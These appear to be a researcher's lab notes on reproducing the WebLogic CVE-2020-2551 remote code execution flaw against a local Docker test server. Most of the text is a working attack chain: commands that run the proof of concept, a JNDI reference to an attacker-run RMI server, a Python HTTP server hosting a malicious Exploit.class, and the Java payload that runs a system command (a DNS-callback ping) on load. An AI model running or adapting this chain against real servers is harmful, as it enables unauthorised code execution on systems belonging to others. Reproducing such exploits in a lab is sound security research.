Required jar files:
https://drive.google.com/file/d/1ssc_8kkjLnzVMTO7G2aswIMLxSLD1Ali/view?usp=sharing
# compile
/Library/Java/JavaVirtualMachines/jdk1.7.0_79.jdk/Contents/Home/bin/javac -cp /Users/caiqiqi/.m2/repository/org/springframework/spring-tx/4.3.16.RELEASE/spring-tx-4.3.16.RELEASE.jar:/Users/caiqiqi/Downloads/ysoserial-0.0.6-SNAPSHOT-BETA-all.jar:. com/cqq/WeblogicCVE_2020_2551.java
# run
/Library/Java/JavaVirtualMachines/jdk1.7.0_79.jdk/Contents/Home/bin/java -cp /Users/caiqiqi/Downloads/wlclient.jar:/Users/caiqiqi/.m2/repository/org/springframework/spring-tx/4.3.16.RELEASE/spring-tx-4.3.16.RELEASE.jar:/Users/caiqiqi/.m2/repository/org/springframework/spring-context/4.3.16.RELEASE/spring-context-4.3.16.RELEASE.jar:/Users/caiqiqi/Downloads/ysoserial-0.0.6-SNAPSHOT-BETA-all.jar:. com.cqq.WeblogicCVE_2020_2551 127.0.0.1
WebLogic environment setup tool: building it with Docker 18 failed at first;
after upgrading Docker to 19.03.5 the build succeeded.
The reason for the failure may be a bug in the VirtualBox bundled with Docker?
Reference:
https://blogs.oracle.com/emeapartnerweblogic/weblogic-1212-installation-in-virtualbox-with-0-mhz-by-frank-munz
Reference:
https://github.com/QAX-A-Team/WeblogicEnvironment
Download WebLogic and the JDK, then:
# build
docker build --build-arg JDK_PKG=jdk-7u21-linux-x64.tar.gz --build-arg WEBLOGIC_JAR=fmw_12.1.3.0.0_wls.jar -t weblogic12013jdk7u21 .
# run
docker run -d -p 7001:7001 -p 8453:8453 -p 5556:5556 --name weblogic12013jdk7u21 weblogic12013jdk7u21
After starting, check WebLogic's debug port:
it is port 8453.
In the end I used 10.3.6.0 + JDK7u21,
and with this project's code the exploit succeeded; the result is as follows:
1. Compile:
/Library/Java/JavaVirtualMachines/jdk1.7.0_79.jdk/Contents/Home/bin/javac -cp lib/com.bea.core.repackaged.apache.commons.logging_1.2.1.jar:lib/com.bea.core.repackaged.springframework.spring_1.2.0.0_2-5-3.jar:lib/permit-reflect-0.3.jar:lib/wlfullclient.jar com/payload/Main.java
2. Run:
/Library/Java/JavaVirtualMachines/jdk1.7.0_79.jdk/Contents/Home/bin/java -cp lib/com.bea.core.repackaged.apache.commons.logging_1.2.1.jar:lib/com.bea.core.repackaged.springframework.spring_1.2.0.0_2-5-3.jar:lib/permit-reflect-0.3.jar:lib/wlfullclient.jar:. com.payload.Main 127.0.0.1 7001 "rmi://192.168.170.1:1099/Exploit"
javax.naming.NamingException: Unhandled exception in rebind() [Root exception is org.omg.CORBA.MARSHAL: vmcid: 0x0 minor code: 0 completed: No]
at weblogic.corba.j2ee.naming.Utils.wrapNamingException(Utils.java:83)
at weblogic.corba.j2ee.naming.ContextImpl.rebind(ContextImpl.java:392)
at weblogic.corba.j2ee.naming.ContextImpl.rebind(ContextImpl.java:350)
at javax.naming.InitialContext.rebind(InitialContext.java:427)
at com.payload.Main.main(Main.java:46)
Caused by: org.omg.CORBA.MARSHAL: vmcid: 0x0 minor code: 0 completed: No
at weblogic.corba.idl.RemoteDelegateImpl.postInvoke(RemoteDelegateImpl.java:477)
at weblogic.corba.idl.RemoteDelegateImpl.invoke(RemoteDelegateImpl.java:384)
at weblogic.corba.idl.RemoteDelegateImpl.invoke(RemoteDelegateImpl.java:341)
at org.omg.CORBA.portable.ObjectImpl._invoke(ObjectImpl.java:475)
at weblogic.corba.cos.naming._NamingContextAnyStub.rebind_any(_NamingContextAnyStub.java:52)
at weblogic.corba.j2ee.naming.ContextImpl.rebind(ContextImpl.java:378)
... 3 more
Caused by: org.omg.CORBA.MARSHAL: vmcid: 0x0 minor code: 0 completed: No
at sun.reflect.NativeConstructorAccessorImpl.newInstance0(Native Method)
at sun.reflect.NativeConstructorAccessorImpl.newInstance(NativeConstructorAccessorImpl.java:57)
at sun.reflect.DelegatingConstructorAccessorImpl.newInstance(DelegatingConstructorAccessorImpl.java:45)
at java.lang.reflect.Constructor.newInstance(Constructor.java:526)
at java.lang.Class.newInstance(Class.java:379)
at weblogic.iiop.ReplyMessage.getThrowable(ReplyMessage.java:318)
at weblogic.corba.idl.RemoteDelegateImpl.postInvoke(RemoteDelegateImpl.java:468)
... 8 more
------------------------
----没有回显 自行检测----
------------------------
The HTTP server that listens:
python3 -m http.server 80
It serves the Exploit.class file compiled from Exploit.java:
public class Exploit {
    // The constructor runs when the class is loaded via the JNDI reference
    public Exploit() {
        try {
            java.lang.Runtime.getRuntime().exec("ping weblogic.f9daa4b2c9be9ad66693.d.zhack.ca");
        } catch (java.io.IOException e) {
            e.printStackTrace();
        }
    }
}
Then use marshalsec to start an RMI server:
java -cp /Users/caiqiqi/GitProjects/marshalsec/target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://192.168.170.1/#Exploit" 1099
At first I thought it was a WebLogic version problem, but later found that JDK7u21 + 12.1.3.0 also worked, so it must have been a problem with the earlier PoC.
Exploit.java needs to be compiled with a lower-version javac; after success the log looks like this:
https://github.com/Y4er/CVE-2020-2551
If exploitation does not succeed, this article may help:
漫谈WebLogic CVE-2020-2551
About com.bea.core.repackaged
At first I thought the JtaTransactionManager in the PoC was Spring's own org.springframework.transaction.jta.JtaTransactionManager; only after reading other people's PoCs did I learn that this class is WebLogic's bundled com.bea.core.repackaged.springframework.transaction.jta.JtaTransactionManager.
I won't dig into it further.